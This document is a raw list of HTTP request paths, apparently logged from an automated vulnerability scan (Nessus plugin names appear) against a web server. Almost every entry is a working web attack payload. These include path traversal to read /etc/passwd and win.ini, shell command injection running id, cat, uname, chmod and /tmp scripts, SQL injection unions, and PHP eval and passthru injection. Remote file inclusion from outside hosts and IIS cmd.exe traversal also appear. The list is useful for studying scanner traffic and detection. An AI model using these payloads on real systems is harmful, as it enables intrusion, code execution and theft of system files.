/lang/lang.php?lang_path=/etc/passwd\x00 /scripts/nffhikq061nq.sh /hrttz9fj.jspa? /0w155a7c.cfc? /jnv890lt.x? /examples/jsp/colors/bb-hist.sh?histfile=../../../../../etc/passwd /top.php?stuff='del q24953383 # /main.php?logout='sleep 10 # /nosuchurl/> /top.php?stuff="&ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b /'dailyfed/ /examples/jsp/sessions/?"> /a0imiuf1.dll? /javascript/htpasswd.pfx /vjbrrppi.jspa? /ygkjkngd.kspx? /examples/jsp/cal/index.php?id=0rop9yeuxw' /javascript/styles.exe /main.php?logout="&ping;-w;10000;-n;1;4.3.2.1&rem; /examples/jsp/jsp2/jspx/common/visiteurs/include/menus.inc.php?lvc_include_dir=/etc/passwd\x00 /m5103snj.htm? /o6ebbirj.html? /opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/llumt7msyau5y?\x00 /examples/jsp/error/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\x00 /javascript/component.exe /cgi-bin/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00 /main.php?logout="|ping,-w,7000,-n,1,1.2.3.4|rem, /examples/jsp/jsp2/el/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine= /en-us/account/webappmon.exe?ins=nowait&act=natping&sel="255.255.255.255 & id&" /user.php?caselist[bad_file.txt][path]=@rfiurl&command=cat /etc/passwd /uvazfs7p.jsp? /main.php?logout="&ping;-w;8000;-n;1;1.2.3.4&rem; /d44uk9h2.jspa? /javascript/n.exe /gm_scripting/ /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/jdvccfaqtd0;')."]=1 /main.php?logout=";uname >q32339726 # /1r8cfrlf.cgi? /en-us/s7qus4g3.asp? /ciamos_path/modules/forum/include/config.php?module_cache_path='http://192.168.202.96:8080/ipb5ri?' /0rufe52p.exe? /cgi-sys/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /recordings/include/theme.inc.php?fullpath=/etc/passwd\x00 /scripts/c0kha6w3apd3.cgi /script/fckeditor/editor/filemanager/browser/default/frmupload.html /lsoix5h3.exe? /horde/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x /awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/cegnlginfc.sh;echo|awstats842638.txt /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16 /scripts/tinfo.php?id=1332010409 /subscriptions.jsp /jdx255ea.htm? /i7prbs22.dll? /main.php?stuff=&rm;q66756841&rem; /dir_thatware/config.php?root_path=http://cirt.net/rfiinc.txt?' /examples/jsp/jsp2/el/main.php?g2_view=zipcart.download&g2_file=../../../../../../../../../../../../etc/passwd /fpnpp5zg.nsf? /manager/cgiip.exe/wservice=wsbroker1/webutil/ping.p /cgi-exe/htimage.exe/path/filename?2,2 /top.php?stuff="uname\x09>q19771951\x09# /examples/jsp/cal/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1 /h5sc3gxy.pl? /cgi-914/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /main.php?logout="\x0dsleep 9 # /examples/jsp/num/welcome.php?custom_welcome_page=/etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;/./tmp/gjvtlghpjb0 > /dev/null &;echo|awstats573600.txt /main.php?logout=&uname\x09>q21614636\x09# /examples/jsp/jsp2/jspx/index.php?album=../../../../../../../../../../etc/passwd\x00 /hipkz026.dll? /scriptless/ /nyvbv05h.dll? /index.php?configfile=../../../../../../../../../etc/passwd /calendar.php?week="> /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+00+10+00+00+00+20+00+00+00+00+40+00+00+10+00+00+00+02+00+00+04+00+00+00+00++>>ctdn /javascript/htpasswd.as /"free market"/ /phpmyadmin/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\x00 /en-us/account/login?return_to=/en-us/manager/launcher/admin/directory?app_only=1&ns=xss /help.php?q=ver,>q99682555&rem, /l752x1ry.asp? /main.php?logout='\x0ddel\x09q39919215\x09# /en-us/h5sc3gxy.fts? /yver8r9o.pl? /recordings/tombstone.cfm?profileid= /help.php?q="rm q85487167&rem /en-us/33y9gcqq.htm? /en-us/n9xlumt5.cfm? /scripts/search/show.pl?url=http://www.google.com /examples/servlets/servlet/ikonboard.cgi?act=st&f=1&t=1&hl=nessus&st=' /examples/jsp/sessions/search.cgi?..\..\..\..\..\..\windows\win.ini /notify?from=nessus"|id" /fmnveedu.x? /d5a5renl.mscgi? /ju0u7kfo.php3? /javascript/document.manifest /? /cgi-915/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /fnwhrxyd.cfc? /top.php?stuff="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /..\..\..\ /scripts/carello/carello.dll /examples/jsp/error/bb_func_txt.php?pathtofiles=/etc/passwd\x00 /recordings/wiki/edit.php?page=sandbox&suck_url=../kernel/config_inc.php&do_suck=h /l4fz1dqw.jspa? /javascript/transparent.exe /dda2qr7j.mscgi? /javascript/.passwd.tgz /webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd /esmozg5d.cfm? /examples/jsp/error/mylog.html?screen=/etc/passwd /bmeun223.php? /recordings/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /scripts/admin.pl /en-us/ /javascript/.passwd/ /ghswfouu.nsf? /sessiondescriptionprotocol/ /h4bi26jd.cgi? /scripts/index.php?board=nonexistant1391471476 /static//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd /! cabella's big game hunter - alaskan adventure/ /cgi-bin/search/show.pl?url=file:/etc/passwd /yef5f3d5.pl? /javascript/creator.exe /v3axg1p8.dll? /egaet53a.cfc? /scripts/2pwudii1mt22.asp /yver8r9o.dll? /? /ddoworrl.jsp? /examples/jsp/jsp2/el/welcome.php?custom_welcome_page=/etc/passwd\x00 /main.php?stuff='\x0drm\x09q61875212\x09# /um7xpn15.php3? /help.php?q="&del q34212187 # /scgi-bin/a1stats/a1disp4.cgi?../../../../../../../etc/passwd /javascript/htdocs.exe /examples/jsp/sessions/cwmail.exe /jujgxwav.pl? /cgi-bin/index.asp?user=' /index.php?id=h6xj4vcok1' /javascript/pivot.exe /miz4r5hz.mscgi? /phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../vtigerservice.php\x00 /scripts/cc_guestbook.pl //

/azcrfs8d.mscgi? /t-script_4/ /javascript/author.exe /phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1; passthru('id'); die /examples/jsp/num/wikka.php?wakka=homepage/../../actions/wikkachanges /phpmyadmin/shoutbox.php?conf=../ /jw64yq8u.idc? /javascript/clk.exe /main.php?frm_daynight=day&frm_passwd=&frm_referer=q68315591&frm_user=&scr_height=&scr_width= /cgi-bin/mail/emumail.cgi?type=/../../../../../../../../../../../../../../../../etc/passwd\x00 /main.php?logout='uname >q44999749 # /aj3pf49c.x? /starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\x00 /examples/jsp/sessions/index.php?cat_select= /cgi-bin/faq.php?action=&type=view&s=&id=-1' union select 0,475189625,0,0,0,0,0-- /phpmyadmin/download.php?language=/etc/passwd\x00 /cgi-bin/adlayer.php?layerstyle=../../../../../../../etc/passwd\x00 /directory.php?dir=;cat /etc/passwd /examples/jsp/cal/googlesearch/googlesearch.php?app[path][lib]=/etc/passwd\x00 /ows-bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /scripts/include/monitoring/engine/makexml.php?fileoreonconf=/etc/passwd\x00 /scripts/ui/login?user=nessus-1331908665 /main.php?stuff="rm\x0bq47639929&rem\x0b /h5sc3gxy.jsp? /a1stats/a1disp3.cgi?/../../../../../../etc/passwd /fmnveedu.php? /javascript/test2.exe /examples/jsp/jsp2/jspx/c32web.exe/getimage?imagename=cart32.ini\x00.gif /faq.php?action=&type=view&s=&id=-1' union select 0,1451427823,0,0,0,0,0-- /cgi-bin/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /javascript/document.jhtml /en-us/i686v90l.html? /scripts/check-lom.php?etcdir=http://192.168.202.118:8080/moclyxlwqyfjnp? /dagent/downloadreport.asp?agentid=1111&pass=2;select plus_downloadreport_sql_injections.nasl /h5sc3gxy.idc? /main.php?stuff='rm q95495989 # /xsqln7eb.html? /en-us/account/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00 /main.php?logout="ping\x0b-w\x0b8000\x0b-n\x0b1\x0b1.2.3.4|rem\x0b /fmnveedu.cfm? /u8yiqilu.pl? /5qnlm5z2.cfc? /t7tm4m0b.asp? /recordings/cgiwrap/cgiwrap_error_page_handling_xss.nasl /awstats/awstats.pl?migrate=|echo;chmod 555 /tmp/xmefwyizyj0;echo|awstats302824.txt /scripts/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl /main.php?logout="&del,q77644543&rem, /l13b77e5.php3? /inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/tzhfyzkbomspvm? /x2gyorli.cgi? /help.php?q="ver\x09>q57557316&rem\x09 /help.php?q='sleep 7 # /9o6g5vkn.cfm? /zln2hm2z.php3? /rpc/..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s..\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\+/og /recordings/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /main.php?stuff='\x0asleep\x098\x09# /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+4d+24+03+34+9f+8b+7d+28+f3+a6+61+75+17+8b+55+f8+8b+4d+fc+66+8b+04+5a+0f+bf++>>esbq /examples/servlets/servlet/notify?from=nessus"|id" /b4vng02k.cfc? /javascript/.passwd.pm /examples/jsp/checkbox/catalog.php?action=category_show&id=' /javascript/document.test /scripts/index.php?string=' /javascript/.htpasswd.sfish/`false` /bin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /recordings/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd\x00&bn=fm_d1 /cgi-bin/newsdesk.cgi?t=../../../../../../etc/passwd /javascript/document.php3 /6wb70v0b.html? /brian's_guide/ /cgi-bin/awstatstotals.php?sort="].passthru('id').exit().$a[" /scripts/r.cgi?file=../../../../../../../../../../etc/passwd /sendcard.php?view=1&id='sendcard_sql.nasl /examples/jsp/security/protected/is_cgi_installed3_j_security_check;jsessionid=5680ad1b9956cf0a8a9f08a20f983ee61586800228~ /3m5knyc4.do? /scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 /squirrelcart/cart_content.php?cart_isp_root=/etc/passwd\x00 /phpmyadmin/passwd /afpl ghostscript_information/ /scripts/samples/search/simple.idq /ifip-description/ /main.php?stuff="|ping;-w;7000;-n;1;1.2.3.4|rem; /d44uk9h2.asp? /j4rdyhw8.pl? /cgi-home/fileseek.cgi?foot=&head=;cat /etc/passwd| /main.php?stuff='del q94914736 # /examples/jsp/colors/index.php?gadget=glossary&action=viewterm&term= /d765w06j.jspa? //..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd /moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+echo+db+68+74+49+6e+66+68+4e+74+53+65+54+50+ff+54+24+38+50+8d+4c+24+30+6a+04+51+6a++>>ctdn /um7xpn15.nsf? /main.php?stuff="rm\x0cq43448647&rem\x0c /9ko6m4c8.html? /bl8sefdm.mscgi? /examples/jsp/jsp2/el/error.php?selected_theme= /edv3mapy.jsp? /top.php?stuff="ping\x0b-w\x0b10000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /help_text_vars.php?pgv_base_directory=../../../../../../../../../etc/passwd /n9xlumt5.x? /en-us/h5sc3gxy.cfc? /en-us/account/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /subscription-info/ /recordings/bandwidth/index.cgi?action=showmonth&year=&month= /javascript/limit.exe /y8pmygrp.asp? /scripts/tomcat_proxy_directory_traversal.nasl1332010414 /xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/ezgnbzqprg.sh+>+/dev/null+&'); function v /examples/jsp/checkbox/search.php?submit=true&search='); /en-us/hipkz026.fts? /? /main.php?logout="ping\xa0-w\xa08000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /examples/jsp/checkbox/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /if69ddo1.cgi? /i2n4v4rl.jspa? /cgi-exe/gw5/gwweb.exe?help=bad-request /uvazfs7p.aspx? /examples/jsp/sessions/core/editor.php?editor_insert_bottom=/etc/passwd /l13b77e5.exe? /scripts/users/users.php /cgi.cgi/c32web.exe/getimage?imagename=customeremail.txt\x00.pdf /scripts/tinfo.php?id=1331904209 /admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.118:8080/iroy1gvqrrqu?? /? /javascript/publications.exe /ewc3rz1l.dll? /javascript/ignore.exe /scripts/cleartrust/ct_logon.jsp?ctloginerrormsg= /snippetmaster/includes/vars.inc.php?_session[script_path]=http://cirt.net/rfiinc.txt? /cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908877,462918967 -- /javascript/transport.exe /javascript/document.exe /cgis/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go /ap58k3ci.asp? /<200603291315/ /top.php?stuff=ver,>q18885325&rem, /eldredtranscript/ /examples/jsp/checkbox/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params"having 1=1 /vwmg565s.aspx? /javascript/reminder.exe /weq93ppb.mscgi? /scripts/www/delivery/ac.php?bannerid=-1331904221+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ngbfhgz5]));die;/* /main.php?logout="ping;-w;7000;-n;1;4.3.2.1|rem; /cacti/index.php?src=1&_common=1&time=1331905227&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\x00 /examples/jsp/num/shopexd.asp?catalogid='42 /cgi-bin/pdesk.cgi?lang=../../../../../../../../etc/passwd\x00 /opensiteadmin/scripts/classes/form.php?path=http://192.168.202.118:8080/iroy1gvqrrqu?\x00 /examples/jsp/error/sendtemp.pl?templ=../../../../../etc/passwd /en-us/oie504mr.asp? /scripts/adxmlrpc.php /main.php?logout=ver\xa0>q14678363&rem\xa0 /cgi-sys/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd /3hlysl2x.jspa? /yef5f3d5.nsf? /9kr0ih0v.mscgi? /s7qus4g3.mscgi? /tukodz3j.mscgi? /main.php?logout="&uname\x09>q22899423\x09# /help.php?q="ping\x09-w\x099000\x09-n\x091\x094.3.2.1|rem\x09 /javascript/howto.exe /top.php?stuff=\x0auname >q51153423 # /jujgxwav.cfc? /examples/jsp/jsp2/el/include/theme.inc.php?fullpath=/etc/passwd\x00 /main.php?logout='&rm q25729498 # /recordings/embed/day.php?path=/etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;echo x;echo|awstats544698.txt /en-us/9kr0ih0v.kspx? /mv8wxfy9.kspx? /javascript/gif.exe /scripts/ion-p.exe?page=c:\\winnt\\win.ini /scripts/slwebmail/showlogin.dll?language=fr /scriptsentry/ /? /javascript/23.exe /cancelsubscription/ /en-us/33y9gcqq.dll? /scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file¤tfolder=/fckeditor_currentfolder_file_upload-1331904249.php. /main.php?logout="rm\x09q95413462&rem\x09 /phpmyadmin/documentation.html?phpmyadmin=file:///etc/passwd /s7qus4g3.exe? /examples/jsp/error/am.pl?path=bin/mozilla&action=display_form&file=users/etc/passwd&login=root+login /javascript/icon.exe /um7xpn15.fts? /javascript/receive.exe /top.php?stuff=";rm\x09q51581738\x09# /main.php?logout="|ping,-w,8000,-n,1,1.2.3.4|rem, /main.php?stuff="ping\xa0-w\xa08000\xa0-n\xa01\xa04.3.2.1|rem\xa0 /recordings/viewcvs.cgi/?cvsroot= /htbin/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00 /description_subhead/ /dir_thatware/config.php?root_path=http://192.168.202.118:8080/tzhfyzkbomspvm?' /javascript/interim.exe /javascript/decrypt.exe /tuwjta1w.dll? /main.php?stuff='\x0duname >q97623189 # /b5xdqgz2.php? /i2n4v4rl.asp? /examples/jsp/sessions/demos/demo.browse.php?filename=/etc/passwd /top.php?stuff='\x0arm q53951968 # /examples/jsp/jsp2/el/snpfiltered.pl?t=c&u= /examples/jsp/cal/welcome.php?custom_welcome_page=/etc/passwd\x00 /en-us/h5sc3gxy.dll? /htdocs/../../../../../../../../../../../../../etc/passwd /l752x1ry.asp? /main.php?logout=&ver\x09>q12662543&rem\x09 /main.php?logout="&rm q75783223&rem /zoomstats/libs/dbmax/mysql.php?globals['lib']['db']['path']=http://192.168.202.96:8080/4dckqcc0acprbz?? /web_store/web_store.cgi?page=../../../../../../etc/passwd\x00.html /examples/jsp/jsp2/el/carbo.dll?icatcommand=..\..\..\..\..\..\winnt\win.ini&catalogname=catalog /help.php?q='\x0drm\x09q57419215\x09# /0w155a7c.php3? /b5xdqgz2.fts? /examples/jsp/cal/doc/index.php?s=/etc/passwd\x00 /main.php?stuff=ver\x0c>q68677588&rem\x0c /help.php?q=&ver\xa0>q85836551&rem\xa0 /examples/jsp/colors/edit_image.php?dn=1&userfile=/etc/passwd&userfile_name= ;id; /scripts/gtcatalog/password.inc /606wkcop.html? /examples/jsp/cal/jgs_portal_statistik.php?meinaction=themen&month=1&year=1' /inc/download_center_lite.inc.php?script_root=http://192.168.202.96:8080/4dckqcc0acprbz? /cgi-win/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /examples/jsp/num/ftp/ftp.pl?dir=../../../../../../etc /examples/jsp/checkbox/login.php?course="> /0qhcnefz.do? /scripts/fgos1sb1c1tr.asp /8t9v8k7x.html? /byrg33fw.asp? /main.php?logout="|ping\x09-w\x098000\x09-n\x091\x094.3.2.1|rem\x09 /en-us/33y9gcqq.asp? /jujgxwav.cgi? /cacti/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w /uvazfs7p.idc? /en-us/9kr0ih0v.fts? /scripts/search.jsp?q=%" /viewimg.php?form=1&path=../../../../../../../../../../etc/passwd&var=1 /cgi-bin/gw5/gwweb.exe?help=bad-request /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../vtigerservice.php\x00 /main.php?logout="|ping\x0b-w\x0b10000\x0b-n\x0b1\x0b4.3.2.1|rem\x0b /irssi-script/ /main.php?stuff='\x0dsleep\x097\x09# /doc/index.php?s=/etc/passwd\x00 /yacs/scripts/update_trailer.php?context[path_to_root]=@rfiurl?context[path_to_root]=@rfiurl? /bl8sefdm.fts? /main.php?logout=&ping;-w;8000;-n;1;1.2.3.4&rem; /fo564rei.kspx? /cacti/awstatstotals.php?sort="].passthru('id').exit().$a[" /main.php?stuff="ping\xa0-w\xa011000\xa0-n\xa01\xa01.2.3.4&rem\xa0 /recordings/review.php?id=1&cat=&subcat="> /main.php?stuff="&del q33239588 # /main.php?stuff=ver;>q96335299&rem; /javascript/mem.exe /7uz3ok60.cfm? /job descriptions/ /scripts/index.php?page=documents&doc=-99' union select null,null,'nessus','dcpportal_sql.nasl',null,null,null,null,null,null,null,null-- /quagynka.idc? /examples/jsp/num/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1 /scripts/news/index.dot?id=../../../../../../../../../../../..//boot.ini\x00.jpg /azcrfs8d.cfm? /scripts/cxvae_g3rjys.php /scripts/directorypro.cgi?want=showcat&show=../../../../../etc/passwd\x00 /cgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe /scripts/calendar.php?month=' union select 1,1,'1332008330','calendarix_month_sql_injection.nasl',1 # /7dbjwpw6.html? /javascript/.passwd.part /examples/jsp/num/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /phpmyadmin/documentation.html?phpmyadmin=/../..//../..//../..//../..//../..//etc/passwd\x00 /mcptranscript/ /javascript/.htaccess.sfish/"`false`" /test.php?evalme=eval($_server[http_x_durgqrrwohhdlkkqd]); /scripts/nckowqpd4zng.php3 /help.php?q='\x0duname >q95327467 # /examples/jsp/checkbox/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd|| /cgi-local/cgiemail-1.6/cgicso?query= /en-us/dda2qr7j.jsp? /weq93ppb.aspx? /javascript/phorum.exe /b4vng02k.kspx? /fcgi-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head= /php/mlog.html?screen=/etc/passwd /main.php?logout="\x0auname >q86286812 # /javascript/document.java /?ilang=eng&sid=2" /javascript/team.exe /cgis/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd| /edv3mapy.php3? /scripts/..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v..\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\+/og /examples/servlets/servlet/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\x00 /jnv890lt.aspx? /cgibin/pfdispaly.cgi?../../../../../../../../../../etc/passwd /9ko6m4c8.x? /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331908785&lang_crm=../../vtigerservice.php\x00 /manual/servlets/scripts/shoes/shoeform.htm /moore's_law/ /33y9gcqq.mscgi? /ewc3rz1l.php3? /javascript/affiliate.exe /examples/servlets/servlet/webplus.exe?script=webplus_install_path.nasl /examples/jsp/jsp2/el/awstatstotals.php?sort="].passthru('id').exit().$a[" /top.php?stuff=\x0duname >q74771226 # /index.php/content/search/?sectionid=3&searchtext= /subscriptions.cfm /javascript/mp.exe /examples/jsp/jsp2/el/man-cgi?section=0&topic=ls;id /examples/jsp/cal/edit.jsp?page=user&editor=../../../install /main.php?logout="&del\x0bq19661861&rem\x0b /cgi-914/gwweb.exe?help=bad-request /8x6w469u.cfc? /phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1332008595&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /main.php?stuff=|ping;-w;9000;-n;1;1.2.3.4|rem; /scripts/unlg1.1 /lsoix5h3.mscgi? /zabbix/frontends/php/locales.php?download=1&langto=1&extlang[".system('chmod+555+/tmp/xvvpghsokp0;')."]=1 /examples/jsp/error/viewpage.php?file=/etc/passwd /examples/jsp/jsp2/jspx/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor /en-us/oie504mr.do? /cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/cfm/upload.cfm?command=fileupload&type=file¤tfolder=/reqtgy.jsp\x00 /examples/jsp/jsp2/jspx/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /awstats/awstats.pl?migrate=|echo;/./tmp/lcqujjmwty.sh;echo|awstats344911.txt /cgi-915/r.cgi?file=../../../../../../../../../../etc/passwd /scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331905034&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /t578vqea.fts? /examples/jsp/colors/cart32.exe /ttxssh2_218/ /main.php?stuff="ping -w 11000 -n 1 1.2.3.4&rem /en-us/oie504mr.nsf? /main.php?stuff="del\x09q51339959\x09# /script_path/config.inc.php?_path=http://cirt.net/rfiinc.txt?? /script/gestion/index.php?path_inc=http://cirt.net/rfiinc.txt? /xsqln7eb.nsf? /cacti/index.php?gadget=glossary&action=viewterm&term= /recordings/workarea/contentdesigner/ekformsiframe.aspx?id="> /scripts/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /606wkcop.fts? /examples/jsp/error/?"> /phpmyadmin/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl /tukodz3j.dll? /cgi-bin/alibaba.pl|dir ..\\..\\..\\..\\..\\..\\..\\, /0u75ldxq.asp? /um7xpn15.pl? /en-us/33y9gcqq.jsp? /main.php?logout='\x0auname >q64819443 # /j734qobz.cfm? /examples/jsp/error/index2.cgi?frames=yes&board=demo&mode=current&threads=collapse&message=../../../../../../../../../../etc/passwd\x00 /apavxugx.fts? /ao22ww7y.aspx? /subscriptionmailsignup/ /lsoix5h3.asp? /init.php?scriptpath=http://192.168.202.118:8080/zz5thkvtmlgl?? / /zv8tv7h8.aspx? /javascript/cs.exe /main.php?stuff="rm\x0cq95513284&rem\x0c /w4996nr0.php? /_vti_bin/fpcount.exe/ /scripts/cevvxrxqxc_b.shtml /main.php?stuff=;del q81835212 # /fpnpp5zg.x? /en-us/.cgi /n1afe1y6.jsp? /cgi-915/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /examples/jsp/error/?mod=read&id=../../../../../../../../../../../../../etc/passwd\x00 /en-us/7o5qp766.cfm? /examples/jsp/checkbox/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd /managesubscriptions/ /javascript/restore.exe /main.php?stuff=&ver >q34994933&rem /javascript/messages.exe /examples/jsp/error/embed/day.php?path=/etc/passwd\x00 / /podtranscript/ /examples/jsp/num/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10 /l13b77e5.asp? /scripts/6gl21a1hiz3s.php3 /source?v=../../../../../../../../../../etc/passwd\x00 /9kr0ih0v.cgi? /y8pmygrp.aspx? /al_initialize.php?alpath=/etc/passwd\x00 /top.php?stuff='\x0arm\x09q46955555\x09# /dir_thatware/config.php?root_path=http://192.168.202.96:8080/no4ghqiguzhst?' /ny1b3qq4.htm? /ht8pn8uq.html? /rbec2ohx.htm? /um7xpn15.exe? /top.php?stuff="rm,q55729425&rem, /examples/jsp/checkbox/awstatstotals.php?sort={${phpinfo()}}{${exit()}} /phpmyadmin/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\x00| /cgi-bin/classes/adodbt/sql.php?classes_dir=/etc/passwd\x00 /bl8sefdm.asp? /w4996nr0.cgi? /product_descriptions/ /jw64yq8u.php3? /examples/jsp/cal/popup.php?include_path=/etc/passwd\x00 /cgi-bin/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331905161 /examples/jsp/jsp2/jspx/index.php?sensor_program= /82q7ywa8.dll? /top.php?stuff="&uname\x09>q22847462\x09# /top.php?stuff="sleep 10 # /scripts///admin.html /scripts/sc877q2pzqne.asp /javascript/jessica.exe /javascript/bofh.exe /main.php?logout='&rm\x09q65543975\x09# /main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=q82299952 /issue_description/ /main.php?logout=ver\x0c>q23587427&rem\x0c /examples/jsp/colors/resetpw.php?email=../../../../../../../../../../../../etc/passwd /main.php?logout="ping\x0c-w\x0c9000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c /top.php?stuff="&ping\x0b-w\x0b8000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b /scripts/gbadmin.cgi?action=colors /index.php?module= /cyclobenzaprine-description/ /main.php?stuff=&ver,>q56966143&rem, /qhvu0pdg.asp? /help.php?q='\x0auname\x09>q87897781\x09# /examples/jsp/colors/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd /main.php /en-us/hipkz026.x? /javascript/notifications.exe /scriptingnewsdirectory/ /mpcgi/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd /qhvu0pdg.do? /guestbook_script/ /tk21352-scriptlet_tools/ /scripts/.%2e/..5cwinnt/system32/cmd.exe?/x+/c+copy \winnt\system32\cmd.exe vp56.exe /i2n4v4rl.dll? /javascript/rakefile.exe /examples/jsp/colors/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl /examples/jsp/num/base_qry_common.php?base_path=/etc/passwd\x00 /htbin/powerup/r.cgi?file=../../../../../../../../../../etc/passwd /yef5f3d5.aspx? /html/chatheader.php?mainfile=anything&default_theme=' /phpmyadmin/engine/admin/admin.php?id_user=../../../../../../../../../etc/passwd /examples/jsp/cal/rss.php?blogid=1&profile=../../config/config.properties.php\x00 /weq93ppb.nsf? /women's rights in islam - modernising or outdated/ /en-us/.htm /main.php?stuff="del\xa0q63696925&rem\xa0 /wscripts/ /b5xdqgz2.jsp? /u8yiqilu.jspa? /thvgjebp.passwd /news.php?config[script_path]=@rfiurl?config[script_path]=@rfiurl? /scripts/cfide/probe.cfm /top.php?stuff=; /y8pmygrp.jsp? /l13b77e5.jspa? /htbin/texis.exe/junk /.jsp /mpcgi/windmail.exe? -n c:\boot.ini hacker@hax0r.com | dir c:\\ /_vti_bin/..\xc0\xaf../..\xc0\xaf../..\xc0\xaf../winnt/system32/cmd.exe?/c+dir /phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00 /actionscript/ /u95h6ymu.x? /recordings/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd /scripts/fpadmin.htm /main.php?logout="ver\x09>q86373985&rem\x09 > hashdum /azcrfs8d.pl? /javascript/iphone.exe /ftp/ftp.pl?dir=../../../../../../etc /h5sc3gxy.jsp? /606wkcop.dll? /ny1b3qq4.idc? /apavxugx.asp? 